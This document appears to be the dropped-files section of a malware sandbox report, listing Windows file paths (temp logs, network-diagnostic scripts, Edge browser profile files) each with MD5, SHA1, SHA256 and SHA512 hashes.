SHA512 e83a732e0583ee71c0b9a54706c90383ad8c94223811263e05273d235e5659e4df47e284dc13af692462899f577b4591b75ebbc66379b0ea89d03990498b3098

C:\Users\Admin\AppData\Local\Temp\Log.tmp

MD5 73828ea24989867e340a28f70bc0c017
SHA1 8233b94ec65ad008ca61a743212c36294ec5902e
SHA256 7122e80459009a96b01d3d73194d4ef244b5d10872c821dadf152d8dcc522b06
SHA512 cda4f8d81dd1811453c94e71d96ac2d79941b141ee4bb1d8de82eca9d7535f2da0168bb603188611732f1aa9f5b8731b97f6d4d087968cf596d12f1ac2842581

C:\Users\Admin\AppData\Local\Temp\Log.tmp

MD5 ee7322fcbf96be5b2d33f28d3d915a47
SHA1 31cc4c16e197414434b2624ea4d9f961e8f43c23
SHA256 c6cceaf1c7a00e40efa9d62cc6ab84afe6ba7e4945e2fc79a0c3a250b6a686de
SHA512 76d5e2e7d072353957bc0f0530a5eae38e82be90824b6c55d30a38e98b93f741ed1e0aff7ca1b8157b6f9c7c62398ba562b86d910f70914ff2492a2512b73b9d

C:\Users\Admin\AppData\Local\Temp\Log.tmp

MD5 f74d89d536e8a2ae426c45a2f3fd0a2b
SHA1 1dc517678defae8318f216de46e6809617cc5d25
SHA256 7d1591b797b62567b88bdaba2a7de55c53742887fbdc9e3aa35c295cb1152431
SHA512 5fd3c62f1dc19709b467e7873a693475e3b7430490da74d99099e9f72af3a3f51e4b291da7cb97fa51089a5bc4ef47fa5adfce33ca995b4db378dbe568e2cce9

C:\Users\Admin\AppData\Local\Temp\Log.tmp

MD5 d78d8756f34b60410512ce9db98f9c7c
SHA1 c3edd333e2b0f09410af79c947c7b835586d47f0
SHA256 efbfada0a598476ca831cfe468a5a014ab95826926ea75481d36eedb5b0d3b46
SHA512 78b3edad5034e1df08ddf3056407aaab6c6b75320d266e7e92a9186c5fbbc4b155723045d92dd15001375030c91bdf0058843f696dfb7ebfb355985bc6b57bda

C:\Users\Admin\AppData\Local\Temp\Log.tmp

MD5 3bc1b30ea8c274aeea80426314d65e31
SHA1 143bd8b11705ba23d42ddb1240f0814404a010c2
SHA256 ae924a80fce21f9e3c7fd33372b18707f8c590ada8672f1a2ba3be573eb8008b
SHA512 35088f92c94c85555b88b834ec24fa5e185f24e722a1c4af7621c98d8191e68787396cffbf96e4cea41758fe5ea6f9b3024a5f71b8d45aa4b9093b90d58336d8

C:\Users\Admin\AppData\Local\Temp\Log.tmp

MD5 9e7626e66af50dedc18aa0e54a06c7fc
SHA1 f1ce29d2b1aa1e96b57d5fc166e74b7228eb17ba
SHA256 ceedfa84b848fccc3cbcfa09f0db4ac742747cc56b34aad6d999a0d6df78545b
SHA512 0d4dfb6bba928b9c84c38f2cc6e0ea0ba033e4ca98a8c52408757e661c810e774c059127742400b362c29dce34b4e0563dd212a846d22dde762c1d9ece704501

C:\Users\Admin\AppData\Local\Temp\Log.tmp

MD5 b6c18bbe93453c0b7a677ad0c2c04afa
SHA1 aa07a6b4ce6ef0f6d149729c978a1493e0f5c3ac
SHA256 697f8e7ae712731587c97ba88f8de5b0d64e3c737a68b4c31ee89f70bec6dd40
SHA512 9ed807f6842d1a19b3c88d8b01b201a14fd9dd1be18055ea04d7a7224f5e630791d9210ba133aed1a45c44b6cbc7b0ca56d991938b2c16da821bf8b71ce46ebe

C:\Users\Admin\AppData\Local\Temp\Log.tmp

MD5 c6af1d6674f7f1da617737000549e4a1
SHA1 bb6f871f2a32f5ced7ea3ab01c0dc3baa44613d9
SHA256 076b4c4c69d1ed14f2ad63fe8310bb1d0ab0a892c3e6d49f29ef973aa336c4f0
SHA512 41d41e4f640c13fce3b20f8677604c279e1956e9ef0a7cd0ffc0f1a2a958784d1902dd9e3c5adade1fabcb5870b480b0474a05d752f43db3fd3970c924484d00

C:\Users\Admin\AppData\Local\Temp\Log.tmp

MD5 dbdcb0970437c0f8c1c323629042c834
SHA1 8b9b67857faac0002119cc73f4acb080e1bc0234
SHA256 8335a76d2c2f08188251ef5847d5746607cea085d70724a6e295d5573cae7b7b
SHA512 0533142a4e58023ced4222c752e87263b7946a4f235523e648556ad92123957edc23406e8ab4d5a4711813f9bd373126b414a8c3bd40cd554a0513228665fba3

C:\Users\Admin\AppData\Local\Temp\Log.tmp

MD5 9a0916ade2f9a068803a48288b09171b
SHA1 80d9a010a5638ce00db38f8b877a26b48c2ee146
SHA256 858d1b6c253e13e864b1a5d335ddcb2c101b1970272010c977556e55d044af07
SHA512 1082460c2305a157e9215aae71968a40b9c13a547e71cdae98b829aed5457278ff939ad4a920bffa77ac7f262c7dc849b6e26ed48741d542fee71c017db0f857

C:\Users\Admin\AppData\Local\Temp\NDFFDA9.tmp

MD5 7af2f1a5ffb42f118679c7249e931c88
SHA1 f837dae90ae7d7a9257230a7d98739619e1dda18
SHA256 70ffa89e0af89bf86cccc17d50dc9659694f5ed0b27b78a04a3275a1bc41c8d0
SHA512 a2df0f344fb8f7e2bf50db07302e619fdb9f2d2d8a5f170110c774643a6e9ebc5ec1d4d4f68cd2872599b00167b261a4fe458eaa7cef65502c6f0619cffb5007

C:\Windows\Temp\SDIAG_afe58d0b-e6fa-48c8-9e9f-4a61efd35c9c\en-US\DiagPackage.dll.mui

MD5 44c4385447d4fa46b407fc47c8a467d0
SHA1 41e4e0e83b74943f5c41648f263b832419c05256
SHA256 8be175e8fbdae0dade54830fece6c6980d1345dbeb4a06c07f7efdb1152743f4
SHA512 191cd534e85323a4cd9649a1fc372312ed4a600f6252dffc4435793650f9dd40d0c0e615ba5eb9aa437a58af334146aac7c0ba08e0a1bf24ec4837a40f966005

C:\Windows\Temp\SDIAG_afe58d0b-e6fa-48c8-9e9f-4a61efd35c9c\DiagPackage.dll

MD5 580dc3658fa3fe42c41c99c52a9ce6b0
SHA1 3c4be12c6e3679a6c2267f88363bbd0e6e00cac5
SHA256 5b7aa413e4a64679c550c77e6599a1c940ee947cbdf77d310e142a07a237aad2
SHA512 68c52cd7b762b8f5d2f546092ed9c4316924fa04bd3ab748ab99541a8b4e7d9aec70acf5c9594d1457ad3a2f207d0c189ec58421d4352ddbc7eae453324d13f2

C:\Windows\TEMP\SDIAG_afe58d0b-e6fa-48c8-9e9f-4a61efd35c9c\NetworkDiagnosticsTroubleshoot.ps1

MD5 d0cfc204ca3968b891f7ce0dccfb2eda
SHA1 56dad1716554d8dc573d0ea391f808e7857b2206
SHA256 e3940266b4368c04333db89804246cb89bf2073626f22b8de72bea27c522282a
SHA512 4d2225b599ad8af8ba8516f12cfddca5ec0ce69c5c80b133a6a323e9aaf5e0312efbcfa54d2e4462a5095f9a7c42b9d5b39f3204e0be72c3b1992cf33b22087c

C:\Windows\TEMP\SDIAG_afe58d0b-e6fa-48c8-9e9f-4a61efd35c9c\UtilityFunctions.ps1

MD5 c912faa190464ce7dec867464c35a8dc
SHA1 d1c6482dad37720db6bdc594c4757914d1b1dd70
SHA256 3891846307aa9e83bca66b13198455af72af45bf721a2fbd41840d47e2a91201
SHA512 5c34352d36459fd8fcda5b459a2e48601a033af31d802a90ed82c443a5a346b9480880d30c64db7ad0e4a8c35b98c98f69eceedad72f2a70d9c6cca74dce826a

C:\Windows\TEMP\SDIAG_afe58d0b-e6fa-48c8-9e9f-4a61efd35c9c\en-US\LocalizationData.psd1

MD5 380768979618b7097b0476179ec494ed
SHA1 af2a03a17c546e4eeb896b230e4f2a52720545ab
SHA256 0637af30fc3b3544b1f516f6196a8f821ffbfa5d36d65a8798aeeadbf2e8a7c2
SHA512 b9ef59e9bfdbd49052a4e754ead8cd54b77e79cc428e7aee2b80055ff5f0b038584af519bd2d66258cf3c01f8cc71384f6959ee32111eac4399c47e1c2352302

C:\Windows\TEMP\SDIAG_afe58d0b-e6fa-48c8-9e9f-4a61efd35c9c\UtilitySetConstants.ps1

MD5 0c75ae5e75c3e181d13768909c8240ba
SHA1 288403fc4bedaacebccf4f74d3073f082ef70eb9
SHA256 de5c231c645d3ae1e13694284997721509f5de64ee5c96c966cdfda9e294db3f
SHA512 8fc944515f41a837c61a6c4e5181ca273607a89e48fbf86cf8eb8db837aed095aa04fc3043029c3b5cb3710d59abfd86f086ac198200f634bfb1a5dd0823406b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 c9041f461132e93f594aef4c22567a01
SHA1 5c6042634ac65fb3e81ff89c47ce2780ff56b476
SHA256 d3ec5c00bd2e9d999fa0264e53c52766614364a48c117bc9853889df6fb2019c
SHA512 c597810c990114fca8d86d985db8e61c8562962cc7f0cd07a88f06aa9748569bce1f8db4ae45feeceef993706d2a13754c18200c774846f2cfaba18bd4eb6ee3

C:\Windows\TEMP\SDIAG_afe58d0b-e6fa-48c8-9e9f-4a61efd35c9c\StartDPSService.ps1

MD5 a660422059d953c6d681b53a6977100e
SHA1 0c95dd05514d062354c0eecc9ae8d437123305bb
SHA256 d19677234127c38a52aec23686775a8eb3f4e3a406f4a11804d97602d6c31813
SHA512 26f8cf9ac95ff649ecc2ed349bc6c7c3a04b188594d5c3289af8f2768ab59672bc95ffefcc83ed3ffa44edd0afeb16a4c2490e633a89fce7965843674d94b523

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 af387375b6efd28eb75029d7643a863c
SHA1 79a190af5a93a43a898016decfdeeca4bc57ae4c
SHA256 e2ae929ad7023da77c2d48274983b0d1ec3dcf9a7aa26f00fc0dbb97a1ed5945
SHA512 2e323be26de02d52af8cda31cfa7356941f6c895edca5790ef26bd51f2716fdcb7fbe1096984854e18e3c3094e08bfecb6a1699e6645e33933a997fe012ed8fc

C:\Windows\INF\netrasa.PNF

MD5 9aeed08b53f9a8f037159d38c2d1b728
SHA1 97104206b0daec8a86c5a042d589e24b0d430885
SHA256 32a2f9372c269fa63ce4e19f02bf9d85ac4b3a6d96a8a944eece6a0bf46c3d0a
SHA512 16598a429371b647e1d84969b77ea14c125c3e70c101abfe5db83b0fea35da6b6d9ec4a1168ef78398a6a1e8b01a77858ea18df02203e34c3395b483066739bb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 4c2458dd89f8675a223101b66e73c97a
SHA1 d22698525a982c04434316f8824f89f4f8fb3fbb
SHA256 4d427c92c9f59eb3457a94eca1cbbda4846e9751567848f03d0c1ca259e4aa3d
SHA512 44c098fbdff31525948865c4da0de6d067aa655d89eb17cf288f952e6e959697d22119d569d070f08824fd7f036e2613fe082dca7816b826051879edadce7b68

C:\Windows\Temp\SDIAG_afe58d0b-e6fa-48c8-9e9f-4a61efd35c9c\result\E3E9C8CC-29C3-4744-B7AC-8F89D4A79EFC.Diagnose.Admin.0.etl

MD5 23f309570819d38a14861b0cf24ec695
SHA1 0786c999debaa417bc8dab63bf21edf818e7fc1d
SHA256 9f3889d8be19a7a6dda4030d2645a3ed0c66655849eba4e10a3ef9b2fbc00c6e
SHA512 4048ef8e7215a338389493ec06b108fc5935e4eecf56fe37b7c118293d9f8db072eaf1a030529563611d56d52e04dc50c4cdaea2d82c7e10bb3110a983b4068a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 f50a091b253172037dd77531196b8e6a
SHA1 7b7f973390d1ca3ab838fbadd952031b92cf2f2c
SHA256 518fbb4abc9695517fc23bc4e93b866318f41deef16b265c3d3d11e3a4855225
SHA512 0f650bbaa413b1a4bed72de2420104e9d032e47bd3a06e8a7c9b93d24ff1770d1dd9775d09931410da99e6c77ec5c5f0982dec6fcbd77d4939f413aeee447856

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 09de602b16b6d8443257146db2bad1c9
SHA1 5dad021072f29bd13813cd5c4bef698075439b8d
SHA256 74fa124e03d07ca98f9a33aba4728de18e1a8caa0460e07630e0830699406bb1
SHA512 c0866ba064c391584a68bb4ac1884793bd3e2da27203f8476bc760429796acb14f0cbc4ba2dcc50966dcec7968be16bdf3460edd83e784d6b15830e1ae687b6a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1

MD5 7c73d321e34419e94ed77d0fd1b53ea8
SHA1 7597770df1590bfb9b859b6c80a23141b56c4232
SHA256 5afc5732b69b310dc0c16f7f94563fa8c02a9e8ee2bf19365c36d6f3a295b297
SHA512 af8517d5cd91052ba5ab8f3e2bb74a3b057e56dd694fca36850cb225a6e4d59e7c7bdbe16363db046dc2ce071f241a002bb85d3c7d553dfb43b58081eee149ba

C:\Users\Admin\AppData\Local\ElevatedDiagnostics\460911090\2024062920.000\NetworkDiagnostics.debugreport.xml

MD5 8ccea272ca15f9f95878b4a75e9a6ca9
SHA1 939c71347274667685d2692481eb849547a21424
SHA256 19973d08d57bdf922ff8d95778536c4623e86713585465286c9a643b9207a795
SHA512 3b5680bc929c84a2f88ae2d9b29554abb53d362ac5d16b1f9af4636395ecef4e6b6594426e7484c938678bd6d054d3df40f574ffdb4f120f397c18be7c1db027

C:\Users\Admin\AppData\Local\ElevatedDiagnostics\460911090\2024062920.000\ResultReport.xml

MD5 129d8019e720103ed877ac6ff04a4297
SHA1 f56ee8aead2c02c6350280c7e33340d186089b03
SHA256 b15c8229e97687c8682a9b8a924f233a1a8994cd41889102e321cf745524800c
SHA512 2a92f706166c4ee5ea1242aee505c1384440f3ad3a6cdd8403efaf245f0b9d63d074b27c4731055bf2201389fefea2d952aceaa6813959a5d52acba85352a34c

C:\Users\Admin\AppData\Local\ElevatedDiagnostics\460911090\2024062920.000\results.xsl

MD5 310e1da2344ba6ca96666fb639840ea9
SHA1 e8694edf9ee68782aa1de05470b884cc1a0e1ded
SHA256 67401342192babc27e62d4c1e0940409cc3f2bd28f77399e71d245eae8d3f63c
SHA512 62ab361ffea1f0b6ff1cc76c74b8e20c2499d72f3eb0c010d47dba7e6d723f9948dba3397ea26241a1a995cffce2a68cd0aaa1bb8d917dd8f4c8f3729fa6d244